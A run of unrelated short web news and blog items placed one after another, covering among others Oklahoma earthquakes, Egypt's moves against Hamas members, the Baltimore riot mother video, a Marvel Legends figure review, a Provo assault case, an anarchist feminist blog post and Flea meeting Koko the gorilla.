WERTZ : Oklahoma is tornado alley , not earthquake country and residents here are slowly getting used to the shaking . But many Oklahomans like the Erwins , still feel rattled . For NPR News , I 'm Joe Wertz in Oklahoma City . Transcript provided by NPR , Copyright NPR .
BETHLEHEM ( Ma'an ) -- Egyptian security services have started to collect information about thousands of Hamas members who were granted Egyptian citizenship during the rule of ousted president Mohamed Mursi , according to Egyptian media .
Egypt 's Day Seven news websites reported that Egyptian authorities plan to revoke the citizenship of 13,757 Hamas members for being `` affiliated to an offshoot of the terrorist group the Muslim Brotherhood . ''
Egyptian authorities are investigating whether Hamas members have been involved in what they describe as `` terrorist attacks , '' adding that the prime minister has the right to revoke the citizenship of Hamas members without a court ruling if it is deemed that they endanger public security .
The Egyptian news site blamed Mursi for facilitating the entry of Hamas supporters into Egypt and granting them citizenship .
On Tuesday , an Egyptian court banned the activities of Hamas and ordered its assets seized .
`` The Egyptian judge who made the decision did not bring a single evidence incriminating Hamas . Thus , the movement considers the Egyptian decision a pure political decision rather than a judicial decision , and that decision serves the Israeli occupation , '' a Hamas official said following the ruling .
Ties between Cairo and Hamas flourished during president Mohamed Morsi 's year in power but have drastically deteriorated since a military coup in July last year which saw the Muslim Brotherhood leader ousted from power .
Cairo 's new military-installed authorities launched a deadly crackdown on protests by supporters of Morsi , killing in excess of 1,400 people .
Egyptian troops have also destroyed hundreds of smuggling tunnels under the border with Gaza used to supply the Palestinian enclave with fuel and construction materials due to Israeli restrictions .
Hamas has denied accusations by Egyptian officials that it is involved in fighting in the Sinai Peninsula , where militant attacks on security forces have surged since July .
The Baltimore teenager who was smacked by his angry mother during Monday 's riots — a moment seen in a video that quickly went viral — says he learned a lesson from his public shaming . But some are questioning the celebration of her tactics .
In a pair of interviews , Michael Singleton described the confrontation .
`` I was just like , 'Oh , man . What is my mother doing down here ? Why would she be down here ? ' '' Singleton told CNN 's Anderson Cooper . `` But when I heard , 'Put that brick down , ' I was like , 'Oh , that 's my mother . ' ''
On Tuesday , Toya Graham , the 42-year-old single mother of six , told CBS News that she did n't want to see her only son become `` a Freddie Gray , '' the 25-year-old who died in police custody earlier this month .
`` I felt as though my friends were down there , '' the 16-year-old said of his decision to join the rioters . `` A couple of my friends had been beaten by the police , killed by the police . So I felt as though I needed to go down there , show my respect . ''
`` I was so angry with him that he had made a decision to do some harm to the police officers , '' Graham told Cooper . `` I just lost it at that point . ''
Or , as Singleton put it , `` It was just World War III from right there . ''
As the clip of the maternal smackdown circulated , Graham was soon branded a `` hero mom . ''
`` Forget the National Guard , '' the New York Post declared on its front page . `` Send in the moms . ''
Today 's cover : `` I do n't want him to be a Freddie Gray . '' http : //t.co/B2hqGbW37o pic.twitter.com/zP9mXOIAcd — New York Post ( @ nypost ) April 29 , 2015
Baltimore Police Commissioner Anthony Batts seemed to agree .
`` I wish I had more parents who took charge of their kids tonight , '' Batts said Monday .
“ I wish all of the parents of Baltimore would take on her spirit and go pull your children out of the streets , ” Pastor Jamal Bryant told Inside Edition .
Graham even got a nod from White House press secretary Josh Earnest , who called the confrontation a `` powerful expression about the role that parents can play . ''
But not everyone believes Graham 's `` tough love '' should be applauded .
`` Anyone white who 's applauding Graham 's moment of desperation , along with the white media figures who are hyping her 'heroism , ' is essentially justifying police brutality , and saying the only way to control black kids is to beat the s -- - out of them , '' Joan Walsh wrote in Salon .
`` Why is America celebrating the beating of a black child ? '' Stacey Patton wrote in the Washington Post . `` It 's not surprising that a black mother in Baltimore who chased down , cursed and beat her 16-year-old son in the middle of a riot has been called a hero . In this country , when black mothers fulfill stereotypes of mammies , angry and thwarting resistance to a system designed to kill their children , they get praised . ''
Graham told `` CBS This Morning '' that she does n't feel like a `` hero . ''
`` I do n't , '' Graham told `` CBS This Morning '' on Wednesday . `` My intention was just to get my son and have him be safe . ''
For his part , the teen said he understands why his mom smacked him .
`` I understand how much my mother really cares about me , '' Singleton told ABC News . `` So I 'm just going to try and do better . ''
Related video :
Porsche sports cars will remain human-driven when desired for as long as it 's legal , the company 's head of finance and IT , Lutz Meschke , has claimed .
In an interview released by the brand , Meschke affirms Porsche 's position on drivers ' ability to choose whether they drive or are driven by the car , with the brand aiming to be one of the last to offer cars with a steering wheel .
Driverless technology naturally features in Porsche 's future strategy , however , with driver assistance and convenience systems such as traffic jam assists and parking pilots taking control when the driver wishes .
Meschke also detailed how autonomous technology can further drivers ' engagement with their car , with the ‘ Mark Webber function ' . This drives the car around a track in the style of a racing driver , demonstrating perfect lines and braking timings .
“ We see digitalisation and autonomous driving not as a threat but as a tremendous opportunity , ” says Meschke .
This opportunity will be capitalised upon in the mid-term , as Porsche plans to make at least 10 % of its business from digital services , with on-demand car-sharing schemes near the top of the list . Another example of this is Porsche 's ‘ Porsche Shield ' on-demand track insurance , already available to customers in Germany .
The brand is also dallying with over-the-air and on-demand software updates for its cars in the future , in line with its Volkswagen Group stablemates , says Meschke : “ it would be possible to combine modules from the area of autonomous driving individually . Imagine that you could use a software update to download a few more horsepower over-the-air at short notice if you want to head to the race track on the weekend – or dynamic headlights if you are headed for a long night drive . ”
REDMOND , WA—goalWA.net reported back on December 14 that Washington Crossfire 's former PDL manager Gary Whitehouse says the club has been sold to a Vancouver BC group and likely will be leaving the state .
The post was shared on the SouthSiders forum ( Whitecaps Supporters ) and from some of the responses we got tips about what might be next .
One poster wrote : TSS , a Vancouver soccer school was apparently attempting to Aquire a PDL license .
Another posted : Would the CSA need to approve them operating in Canada ? And with their continued desire to get the CPL up and running , would they approve a new PDL team in the Vancouver area ? I realize the CPL and PDL are n't competing leagues but they would be competing for the same customers ( those who enjoy some lower division soccer ) and I 'd imagine they would n't necessarily want a new team in a market they want to try to put a CPL team in to .
Which was replied with : My limited understanding is that the BCSA , CSA , and the Whitecaps ( as USL territory rights-holders ) would all need to approve such a team .
There was also a suggestion that the club is looking at Swangard Stadium ( Burnaby ) as a home ground . The Whitecaps played there in their USL days .
goalWA.net sent an email to Colin Elmes , co-owner of Richmond BC 's TSS Soccer Centre .
Hello ,
Just following up on a lead . Are TSS planning on fielding a team in the USL Premier Development League ?
Elmes ' reply was n't exactly a “ no , ” or a “ yes. ” Or was it ?
Thanks for your email .
We have nothing to report on this at this time .
Regards ,
Colin
The right wing is abuzz with a question they find delicious : Why is my paycheck less this week ?
The simple answer for most taxpayers that that Republicans found a tax cut that was n't worth fighting for — yours .
Here are the four reasons your paycheck may be smaller today than it was just a few weeks ago :
1 . With the payroll tax cut President Obama negotiated in 2010 expiring , any income under $ 110,100 will be taxed at a rate 2 percent higher . This tax sustains Social Security , which for many Americans , will make sure they do n't spend their golden years starving . And Republicans never proposed extending it .
2 . You earn over $ 400,000 a year if you 're single , $ 450,000 if married , and your company 's HR department has already factored in that you 've lost your Bush tax break on any income over those $ 400,000/ $ 450,000 amounts . There 's also a new Medicare tax on income over $ 200,000/ $ 250,000 of about 1 percent if you 're married or self-employed . If you pay this , congratulations . You 're likely in the top 1 percent of Americans . You 're the envy of millions of temporarily embarrassed millionaires . And though the tax code is now more progressive than it 's been in 33 years , you 're still paying less than high-earners have historically .
3 . There 's a new 3.8 percent surtax on investment income over $ 200,000/ $ 250,000 . So investments will be taxed more , but still less in most cases than actual work .
4 . You 're a department store Santa .
Of course , a party that blames President Obama for everything from George W. Bush 's economy to their own Civil War , blames President Obama that the payroll tax holiday of 2010 and 2011 has expired .
This is completely ignoring the reality that President Obama 's opening offer to resolve the so-called “ fiscal cliff ” included extending the cut . Take it away , Wall Street Journal :
The proposal marked an opening salvo in negotiations over the fiscal cliff and represented a particularly expansive version of the White House 's wish list , with a heavy focus on tax increases and spending proposals—including keeping in place a payroll-tax cut and extended unemployment benefits .
Republicans rejected that offer , along with any direct stimulus to average taxpayers . The president was able to eventually negotiate an extension of unemployment benefits — which , for any Fox News fans reading this , helps the unemployed . But the payroll tax cuts along with sorely needed infrastructure included in the offer disappeared .
Democrats tried to replace the payroll tax cut with the Making Work Count tax cut the president included in the stimulus , which would keep paychecks about where they were in 2012 . Republicans rejected that , too .
How can you really be sure the Republicans opposed the payroll tax cut ? The House GOP almost killed it off in 2010 .
President Obama often says he 's not perfect , but his worst critics invariably attack him for things that are entirely of their own imagination or the result of Republican policies . The latter is true here and that 's a shame , because an opposition from the right that made fair criticisms about this president would be good for democracy .
By the way : If you earn the minimum wage in one of these 10 states — which are mostly blue states , of course — your paycheck likely is bigger this week . Nice .
Photo : AP Photo/Jacquelyn Martin
Britain 's Energy Policy Going Up In Smoke
By Paul Homewood
http : //www.dailymail.co.uk/money/comment/article-3489370/SIMON-WATKINS-Britain-s-energy-policy-going-smoke-thanks-decades-short-term-politically-driven-policies.html
Bit by bit , the MSM is catching up . From the Mail :
The Chancellor is facing the usual litany of demands from business ahead of this week 's Budget , but there is one issue which is probably of greater significance for the future of the British economy that any other – energy .
This country 's energy policy is a shambles .
The cases of Hinkley Point nuclear power plant and the Drax coal and wood burning plant between them demonstrate the extraordinary mess we are in .
Dirty business : The cases of Hinkley Point nuclear power plant and the Drax coal and wood burning plant ( pictured ) between them demonstrate the extraordinary mess we are in
It is not a mess uniquely created by our current Government , nor the Coalition which preceded it . Instead , it is the result of several decades of short-term politically driven policies and often public posturing by politicians of all stripes .
Industrial battles over our coal industry ; controversy over the safety of nuclear energy ; and , in more recent years , the injection of environmental gesture politics have created a chaotic situation .
I blame accounting – both of the financial and the environmental variety .
And these are not side issues : Drax provides about 8 per cent of the UK 's electricity . Hinkley Point is planned to produce a similar proportion .
The Drax case shows starkly how the system of ‘ carbon accounting ' is a nonsense – or , at the very least , open to the kind of subjective accounting methods we usually associate with advanced tax avoidance .
It is the result of a futile attempt to reduce the question of carbon emissions to a kind of book-keeping . Then there is Hinkley Point . The deal with the French group EDF , backed by China , to build two reactors in Somerset was negotiated at a hugely expensive price .
Under the deal , Britain is guaranteeing to buy electricity from Hinkley at twice the current market rate .
Defenders , such as former Energy Secretary Sir Ed Davey , insist that this is a sound deal not least because it includes the full costs of cleaning up and decommissioning the plants in the future .
That may be true . But it has now emerged that EDF itself has doubts about whether it can afford the risk involved in building the plant .
Last week , its finance director quit – citing Hinkley as a danger to the largely French state-owned group .
Now the boss of Hinkley has gone cap in hand to the French government asking for financial support to go ahead with the scheme .
So the UK could end up depending for 7 per cent of its electricity on a French state subsidy and burning wood that emits more carbon dioxide than coal . What kind of parallel universe is this ?
http : //www.dailymail.co.uk/money/comment/article-3489370/SIMON-WATKINS-Britain-s-energy-policy-going-smoke-thanks-decades-short-term-politically-driven-policies.html
Advertisements
A new mirror wo n't show a reflection unless you flash it a smile .
The concept may seem playful , but industrial designer Berk Ilhan invented the Smile Mirror to uplift the spirits of cancer patients .
The plug-in device looks like a tablet with a built-in camera and an opaque surface made with a smart material triggered by proprietary software . It includes facial recognition technology that captures the face .
The surface becomes reflective , like an traditional mirror , when it recognizes a smile . Just like a conventional mirror , it can hang on the wall or sit on a table .
Ilhan , originally from Turkey , spent two years designing and developing the product .
Related : 23andMe wants to develop drugs based on your DNA
While attending the School of Visual Arts in New York for a master 's degree , he conceptualized a portfolio of products aimed at improving the quality of life of cancer patients on an emotional and social level .
He spent a few weeks at various cancer hospitals in Turkey speaking with patients , oncologists and caregivers .
`` I learned morale and social support are two very important factors that can positively change a patient 's experience , '' Ilhan told CNN Tech .
He honed in on laughter , calling it a `` powerful tool . '' Research indicates smiling and laughter can decrease stress and boost the body 's immune system .
The Smile Mirror was inspired by Ilhan 's conversation with a cancer survivor .
`` She told me in the first days after her diagnosis , it was difficult for her to look in the mirror and acknowledge she had cancer , '' he said . `` Our facial expressions affect how we feel . If we flex our facial muscles to smile , our brains think that something good happened and as a result , [ we feel ] happiness . ''
Related : Amid opioid crisis , some patients turn to tech alternatives
Ilhan is currently producing the Smile Mirror in limited quantities . The price , however , is expensive . As of now , it costs between $ 2,000 to $ 3,000 .
But the product will soon launch on crowdfunding platform Kickstarter , where Ilhan hopes to raise enough funds to produce it in larger quantities and bring down the price to under $ 500 .
Ilhan 's goal is to donate Smile Mirrors to hospitals . He intends for it to appeal to larger audiences .
`` Anyone can buy one , '' he said . `` If you give it to someone , you are gifting them a smile . ''
Hey true believers ! Welcome back to another AC Custom Figures review ! Today I 'm finishing off my Marvel Legends Infinite Series review with the Winter Soldier series and the rest of the Spider-Man series . Better late than never , right ? ! You can find my part 1 review here , and part 2 review here .
The figures included here are the Cap 2 movie versions of Cap , Winter Soldier , and Black Widow , the comic versions of Red Skull , Baron Zemo , Hydra soldier , AIM Soldier , and the Mandroid BAF ! I also finish off the Spider-Man series with Boomerang and Spider Girl .
First up is Captain America ! This is Steve Rogers in his movie stealth suit . The figure is spot on . To sculpt is right from the movie , with paint apps to match . He comes with some interesting interchangeable hands , including a slap hand , nose picker , and fist . His articulation is great with some pretty unique shaped hips that aid his movement . Best part : Cap has 2 interchangeable heads . The masked is great , but the unmasked is a welcome addition considering the previous unmasked Marvel Legends Steve Rogers head that looked like a 60 year old Matt Damon . Worst part : His reverse negative shield is n't from the movie and lends nothing to the figure . If they were going to go with this color scheme it would have been cool to have a battle damaged shield , like in the movie .
Next up is the Winter Soldier himself . I love this figure . A great adaptation of a great take on the WS from the movie . The figure really captures Bucky 's look from the film . To sculpt is completely new , and the masked head captures all the coolness from the movie . And his bionic arm really makes the figure . Best part : the arm . Worst part : a lot of these figures come with awkward oversized weapons that make no sense . Since Bucky is n't the only one that comes with one of these , I 'll say his worst feature is his alternate , unmasked head . It 's poorly painted around the eyes , and makes him look like he has high blood pressure .
The most anticipated figure of the line is probably Black Widow , who did n't get a figure from the Avengers for some reason . I have to say , the figure does look good , and the body sculpt and paints are really nice , but this is the most disappointing figure of the series . The only weapons she comes with are 2 holstered guns on her hip that she ca n't hold because they do n't come out . Which does n't make sense because one set of hands that she comes with are gun hands . They trick you with her BAF pieces because along with the torso , the blaster belongs to the Mandroid . The other pair of hands that she comes with are “ walk like an Egyptian ” hands . Both of her heads look like Johanson , but one one has straight hair and the other has strange posted sex hair . Best part : post sex hair . Worst part : the trick guns .
For some reason Hasbro has an odd habit of reissuing past figures . Included in this line is the WWII Cap from the first Cap movie . I actually really like this figure . It 's a great suit and the paints are really nice . However , I would have much rather have had a comic or movie Crossbones , or the severely overlooked Falcon figure ( makes no sense why he was n't included ) . The Cap that I got had a bum leg right out of the package that actually lent itself to some great photos . Best part : the suit . Worst/ the best part : bum leg .
Now for the villains ! First up is Red Skull . Left out of the first movie line of figures , but here he is in all his glory with a brand-new movie head sculpt , new hands , and a re-issued Punisher base . He 's actually a decent looking figure , especially when he 's holding his accessory , the highly coveted Tesseract ! Made from the same translucent blue plastic that Mattel used for Aqualad 's weapons . Skull also comes with a couple hand guns , one of which is one of those clunky oddballs , but works well with him considering Hydra weapons are pretty unique looking . Best part : the head sculpt looks just like Hugo Weaving 's take on the character . Worst part : an original and new base would have been cool .
Next is one of my favorites . Baron Zemo ! I 've always loved this guy even though he 's rarely seen in the comics . This figure is a welcome update from his old figure . Even though Zemo is a re-used Bucky Cap base , the new head sculpt and new belt with really cool sash really set the figure apart . He has a great new sword that fits into the belt , and a pistol . However , it 's the paints that make him really pop ! Best part : the figure . Worst part : not the figure .
The minions . One of the stars of the series is the AIM figure . You ca n't miss him with the bright yellow , he nearly glows in the dark . The body is almost entirely new . I think he uses a couple parts from the WWII Cap , but they really put more thought into this one than any others . His bee hive head is really cool and holds a lot of articulation . Everything from his collar to his pointy jackboots is a breath of fresh aim , I mean air . This is another figure where the crazy weapons really go well . Just like Hydra , AIM is knows for making some crazy shiz ! Best part : it may seem small , but his bandolier cross chest belt is really cool . It 's got some grenades on it . Rad . Worst part : going blind when you look at him .
Hail Hydra ! The Hydra soldier is pretty cool . A new head sculpt on the new Black Panther body with Bucky Cap hands . His colors are comic appropriate , and again , the weapons are great . His buggy eyes and expression are really fitting as well . Best part : the Hydra octopus on the rifle . Worst part : new details on the body base would have been cool . It 's a bit plain , but his rad harness and belt give him some personality .
The last figure in this wave is the Mandroid BAF . This figure is a beast ! It uses parts from the newest Iron Monger BAF , but enhances them with a giant double sided blade on one arm , and a huge gatling gun on the other arm . He has a shoulder cannon that comes with Scarlet Witch , and the head is really cool . As small as it is it still has a bit of articulation . Best part : the size and bulk of the figure is great , and the body has an almost metallic feel to it . Worst part : the legs have good articulation for the size , but the arms are a bit stiff .
BONUS ROUND ! ! !
These last 2 figures are the last from the Spider-Man series that I did n't get to review earlier . Ladies first , Spider Girl is cool because she 's a new sculpt from head to toe . And she 's age appropriate . The body is n't a curvy Black Cat body , but that of a younger girl . Before this turns too creepy lets move to the head sculpt . Brand new with mask and cool ponytail hair . Her hands add dynamic to the figure , and there is a bagginess to her costume that fits the character . Best part : the ponytail . Worst part : some kind of accessory would be cool . A web or something .
The last figure is Boomerang . A new head on US Agent 's body , but it 's a really cool head sculpt . I really like the articulation of this new base body that Hasbro is using . We first saw it with the Bucky Cap figure , and it has been used since for US Agent , Black Panther , Hydra soldier , and probably a couple more . Boomerang comes with a red neck like gun rack of boomerangs that detaches from his back , and then the 4 boomerangs then detach from the rack . I also really like the color scheme of the figure . It 's very “ Superior Foes of Spider-Man ” . Best part : Boomerack . Worst part : as much as I like the base body , lets move on .
Again , at the end of the day I really like this series . All the figures are really dynamic and pretty unique . They will all look great in any Marvel Legends collection . And for customizing they are great . The joints and joint pegs are easy to change , and most of the heads pop right off . If you are interested in picking some up , even though I am late with this review , Entertainment Earth still has some cases left ! Thanks for stopping by , and stay tuned for more custom figure madness ! Enjoy !
See you in the future !
AC
CSTT Driver Training provides training for both automatic and manual transmission vehicles .
Please inform us of your preference at the time of booking .
For those searching for a career that allows them to work with the public , driving a bus may be the perfect fit for a new career . Regardless of the type of driving job , passenger safety must remain the driver 's first priority . In the many different jobs as a bus driver all require that a schedule be followed . Driving a bus offers many employment opportunities . For those wanting to be home every night , working as transit , school bus driver , or short haul coach captain for companies such as Pacific Coach may provide excellent employment . For those who do not mind being away from home for periods of time , working for Greyhound or as a tour coach driver may offer the perfect job opportunity . Whether working for Greyhound or as a tour bus driver , the job requires that drivers handle passenger concerns , luggage , some times freight , and wear a uniform . When laid over , drivers sleep in hotels and have access to hot showers – although generally speaking , a number of Greyhound 's hotels provide only basic essentials .
Driving Commercial Vehicles is the guide for this licence .
ICBC Requirements
Buses , including school buses , special activity buses and special vehicles
Buses , including school buses , special activity buses and special vehicles Trailers or towed vehicles not exceeding 4,600 kilograms except if the bus and trailers or towed vehicles do not have air brakes
Trailers or towed vehicles not exceeding 4,600 kilograms except if the bus and trailers or towed vehicles do not have air brakes Any motor vehicle or combination of vehicles in Class 4 & Class 5
Learning Curve
As a bus driver , your first priority is passenger safety . All driving , offloading , and freight handling decisions must be made with this priority firmly in the front of your mind . For those students moving toward a career as a tour , coach , or transit bus operator , they will learn that the unit responds differently owing to the driver 's seating position , located in front of the steer axles . At CSTT , one of our team of ICBC licenced instructors will work with you to teach you about passenger safety , pre- and post-trip inspections , loading and off-loading passengers , emergency breakdowns , and safely maneuvering the unit in city traffic .
Costs
For more information please call CSTT at 250-655-0432 .
All ICBC related fees are the responsibility of the student .
The bulk of buses in this licence class will require an air brake endorsement .
Leading up to Peter Capaldi 's first season debut as the infamous time traveler on “ Doctor Who , ” BBC America will premiere a series of specials , and will team up with Fathom Events for theatrical screenings of the season premiere .
“ Doctor Who : The Companion ” will air at 9 p.m. on August 16 , followed by ‘ The Real History of Science Fiction : Time ” at 10 p.m .
BBC America will also be airing “ Doctor Who : The Ultimate Time Lord ” at 10 p.m. on August 18 , after the “ Doctor Who is a Takeover Week ” kicks off earlier that day at 8 a.m .
Beginning on August 6 , BBCAmerica.com will also be giving fans a chance to vote for their favorite “ Who ” episodes . The top selections will run in a marathon on August 24 .
The net has again partnered with Fathom Events for two days of screenings of the feature-length premiere episode ‘ Deep Breath ' on August 23 and 25 . The episode will be shown in select theaters across the U.S. with 15 minutes of bonus content .
A complete list of theater locations can be found on the Fathom Events website .
In addition , comedian and “ Doctor Who ” superfan Chris Hardwick will host “ Doctor Who : Live Pre-Show ” at 7:30 p.m . ET and “ Doctor Who : After Whom Live ” at 11 p.m. following the premiere of “ Intruders ” on August 23 . The pre-show and post-shows will feature guests in the studio , including writer and actor Mark Gatiss , along with behind-the-scenes footage .
The new season of “ Doctor Who ” premieres August 23 at 8 p.m. on BBC America .
A Christian activist group placed a banner over an atheist display at Chicago 's Daley Plaza proclaiming that “ A is for Angels . ”
The banner covers a sign set up earlier this month by the Freedom From Religion Foundation that explained that an 8.5-foot lighted “ A ” stood for “ atheists ” as part of a protest of Christmas-themed items on the public square .
The activists clashed Thursday with atheists at Daley Plaza over the banner , saying that objections to the counter-protest were inhibiting their constitutional rights .
“ You should n't be protesting the ‘ A . ' Protesting the ‘ A ' means you are surrendering our freedom of speech , ” said a woman who described herself as a Christian activist . “ Everybody should have their opportunity to speak here . ”
She suggested that anyone who disagreed with her to “ go back and read the Constitution . ”
The atheist display celebrates the “ season of the Winter Solstice , ” and shows constitutional framers Benjamin Franklin , Thomas Jefferson and John Adams , as well as the Statue of Liberty , standing or kneeling in adoration of the founding document , which was adopted Dec. 15 , 1791 , lying in a manger .
“ We celebrate the birth of the Unconquered Sun – the TRUE reason for the season , ” the banner reads . “ As Americans , let us also honor the birth of our Bill of Rights , which reminds us there can be no freedom OF religion , without having freedom FROM religion in government . ”
William Kelly , chairman of the Remember America Foundation , said that Chicago Mayor Rahm Emmanuel should never have granted the atheist group permission to set up their display .
“ I think if you actually read the text of the atheist display it 's actually more hate speech , ” Kelly said . “ It 's really not adding anything to the Christmas spirit , it 's really not even telling anybody who they really are or what they believe or what they want for society . They 're just saying they do n't like Christianity . ”
He said the display could be upsetting to families with children who expect to encounter a Christmas tree or Nativity scene , but not atheist symbols that criticize their religious beliefs .
“ The message that I 'm bringing here today is that , as Christians , and especially at Christmas time , we 're here to spread a message of love , ” Kelly said .
That 's exactly why the Christian activists printed up a banner , brought it to Daley Plaza to cover up the atheist display and berated onlookers who questioned them , he said .
“ What we 're hoping that it 's possible that if we as Christians show our love and support for our atheist brothers and sisters that maybe , maybe they might be more tolerant toward Christian values , not only you know , at Christmas time , but the entire year , as well , ” Kelly said .
Drew Estate had a lot going on at their booth during IPCPR 2014 . Let me break it down for you . Before I do , this is a picture of JD and me after the interview we had with him . Not my best picture . JD was on point , as usual .
First , Drew Estate completely redesigned their booth . It looked like the Manhattan Bridge . On the outside of the booth there were several pieces of artwork done by the Subculture Studios team . IMHO one of the best booths , if not the best booth at IPCPR this year . Not to mention there were custom painted ashtrays all over the place . Jesse and his Subculture Studios team really made the booth stand out this year .
We had a chance to talk to Willy Herrera about the new Herrera Esteli Norteno . The Norteno will come in five different sizes . I had no idea why the cigar had a bird on the band , until Willy broke it down for us . Apparently , it is a really rare cliff diving bird . Willy said for three days in a row he saw this bird in Esteli . He said it was fate . Watch the video to learn more .
Drew Estate has gone pipes . Drew Estate through their own creation and partnership with Tsuge had several different pipe tobaccos and pipes on display . I loved the pipe which looked like Texas . I wonder why .
The Drew Estate SLAB ( Solutions Lab ) team launched the `` Drew Diplomat '' app and customer loyalty program . You can read all about it here on the Drew Estate website or you can watch my interview with Sam Morales of Drew Estate where he breaks it down in three minutes .
I had the chance to interview the guys from Royal Agio Cigars . Royal Agio and Drew Estate recently entered into a distribution agreement where Drew Estate sells Royal Agio products in the US and Royal Agio sells Drew Estate products in Europe . Learn more about that agreement and Royal Agio 's newest cigar in the video .
Last but not least . I saw several guys in the Drew Estate booth walking around with these legit cigar holders . I know they are made by Tsuge and are n't available as of IPCPR . More to come .
Let me know if you have any questions about Drew Estate from IPCPR 2014 leave a comment and I will do my best to answer it .
PROVO — A man who police say posed as a doctor on Craigslist , lured women to his office and then sexually assaulting them has been charged with 17 felonies .
Borzin Mottaghian , 34 , of Provo , was charged Tuesday in 4th Distinct Court with 12 counts of object rape and two counts of attempted object rape , first-degree felonies ; two counts of forcible sexual abuse , a second-degree felony ; and attempted sexual abuse , a third-degree felony .
A court hearing is scheduled for Monday .
Mottaghian , who is the owner of the Cocoa and Coffee Company drink shop and the Cafe On Fire Persian restaurant , both located in Provo , is accused of posting an ad on Craigslist looking for women for medical research . The ad stated he would `` pay females over the age of 18 $ 200 to participate in 'anatomy research ' for the purpose of developing a new 'medical device , ' '' the charges state .
Mottaghain claimed to one woman that he was making a new type of catheter and had her undress from the waist down before performing an `` examination , '' the charges state .
`` ( Mottaghian ) is neither a doctor nor an engineer , and his claim that he is developing a new 'medical device ' is false and clearly a guise , '' prosecutors wrote in court documents .
A second victim who responded to the ad was allegedly told by Mottaghian that he was developing a new type of tampon . That woman was `` examined '' twice during the same visit , the charges state .
Related :
Police : Provo man posed as doctor , sexually assaulted 2 women Police have arrested a Provo restaurateur who they say posed as a doctor on Craigslist and sexually assaulted two women as part of a purported medical study .
The first woman contacted police a few days later , fearing she had been deceived . Provo police had a female officer go undercover and make an appointment with Mottaghian . After she arrived at his office and he allegedly told her to take her clothes off , other officers entered the room and arrested Mottaghain .
Bail was set at $ 250,000 .
Mottaghian identifies himself as a veteran of the U.S. Marine Corps and says he earned a law degree from the University of California .
According to a bio on the Internet Movie Data Base website , Mottaghian played supporting roles in various movies and television episodes , and was the writer , producer and director for a short film titled `` Blue Sweater . ''
×
Photos
Related Stories
Feminism as Pillar of Freedom
Quick shout-out to women ( broadly/queerly defined ) around the globe , typically struggling so much harder to survive the many assaults on their bodies , minds , and lives . But when push comes to shove , they typically struggle so much more empathetically and fiercely .
Here in Greece , now on the island of Crete ( October 16-19 ) , for the 10-day Mediterranean Anarchist Meetings , I 've been re-inspired by feminist-oriented and anti-heteropatriarchical anarchists and antiauthoritarians . Not only in terms of how they resist , though . I 've rediscovered how the lens they are socialized to see through can serve as better ethic for that resistance — a resistance that is at once about self-constructing better selves in a better culture/society for all who would be human and free .
Last night ( Octobert 17 ) , we heard from three anarchists from Turkey and Kurdistan , including a female lawyer , who spoke of feminism as a key pillar of Kobane and Rojava , equal to other pillars , such as antistatism and anticapitalism , not some footnote — or worse , “ women 's work. ” Over drinks after the talk , the woman told us about the imperfect path of actualizing feminism . Yet she also said that whereas in the past , sexual harassment and assault were common , not spoken about or defended against , now women in the autonomous territory stand up for themselves , and there are communal consequences to such harassment and assault — justice without state or police or prison . The mere fact that sex can be spoken of , this female lawyer told us , is itself a huge part of this transformation in self and society . Indeed , she spoke of how gender relations in general are shifting , not simply on the battlefield , but including , for instance , that within self-governance structures , all of which now have to include two people as the facilitators , conveners , etc . — one female and one male . The impulse to do that is part of this shift in mentality , which increasingly over time , as she noted , starts to impact how people treat each other more generally , acting more egalitarian in everyday life .
Earlier in the day , a Swedish woman told me how their anarchist group has been part of a yearly gathering of European anarchist groups , mostly in the north , around themes . This past year the theme was antifascism . She told me that mostly women and queers came to this gathering , and they decided to ask the question : “ How can we completely get rid of Nazis ? ” Or to mirror the “ strong communities make police obsolete ” phrasing from the United States this past year , “ How can we make fascism obsolete. ” At their gathering , they discussed the “ band-aid ” of fighting Nazis , where big guys literally fight each other , physically , in battles between Antifa and fascists . Instead , they looked to ideas like working with 10- and 12-year-olds who are “ flirting ” with fascism , and speaking to them directly “ from where they 're at ” ( anger toward society , feeling alienated , experiencing “ no future ” ahead , etc . ) to offer alternatives . In her community , she said , it 's worked . Those kids turn away from fascism , and over time , start convincing their friends to do so too . “ It 's about compassion , ” she told me . “ To try to understand why people would be attracted to fascism , ” and from there , use that compassion as strategic lever for different tactics . She added that both the goal of “ no fascists ” and feminist-inflected strategies and tactics flowing from that were so much more varied , expansive , and following along the prefigurative path ( to phrase in my language ) that anarchism and anarchists should be all about .
Not to reify “ women ” as category . I 'm a humanist . Rather , it 's about seeing “ feminism ” not secondary but key to transforming our selves and battling the way in which structures unevenly try to destroy us , such as , say , rape being militarized as weapon of war and “ statist ” power .
We should n't be copying Rojava/Kobane ; we ca n't . But perhaps one of the most inspirational points to draw from that experiment in “ the beauty of freedom ” is not that women are carrying guns and fighting off ISIS and various state militaries — which is of course inspiring — but that the values of feminism are being woven , intentionally , into the body politic and social fabric as linchpin of this fragile autonomous space .
So yeah , big love for feminism and all the variety of women who are strong warriors , both because they have to be and because they know it 's the right thing to do for everyone .
* * *
Note : Please excuse typos ; I 'm writing a bit too quickly , so I can squeeze in more anarchist conversations at this remarkable gathering in Greece .
( Photo by Cindy Milstein , street art of feminist resistance , Athens , Greece , October 2015 . )
Advertisements
According to new numbers from Gallup , John Boehner 's net favorable rating has tumbled 20 points since January , going from a +20 to dead even .
The drop was most pronounced among independents , who now have net unfavorable view of the Speaker , going from +16 to -11 , a drop of 27 points .
Boehner also dropped among Democrats , going from -9 to -26 . He still has a positive net approval rating among Republicans , but even that has dropped by 12 points , going from +54 to +42 .
My bet is that these numbers are dropping not because of anything Boehner has done in particular , but rather because Congress is never particularly popular and because people continue to be unhappy with the country 's economic situation . It reminds me of what Boehner said the other day about how President Obama 's reelection chances are linked with economic performance . It 's time for him to realize he 's got something at stake here too .
Is Flea recruiting for the next Red Hot Chili Pepper ?
The Red Hot Chili Peppers guitarist had an unusual jam session with famous gorilla Koko in Woodside , California , over the weekend . The rock star posted several images and videos from the occasion on both his Instagram and Twitter accounts . In one video uploaded to the band 's YouTube page , Flea talks about his life-changing interaction with Koko .
“ This is just the greatest thing that could ever happen , ” he said in the video , which showed Flea laying down as Koko strums his guitar . “ This is the day that I will never forget in my life . ”
Koko has made a name for herself because she has reportedly learned sign language . To date , Koko has reportedly earned over 1,000 signs and knows approximately 2,000 English words , according to the Gorilla Foundation 's website .
Flea and Koko Source : Red Hot Chili Peppers/YouTube
Flea also posted several images with his new music-loving friend , included the two embracing each other . He captioned the photo , “ My sweet and true friend koko . ”
Get push notifications with news , features and more .
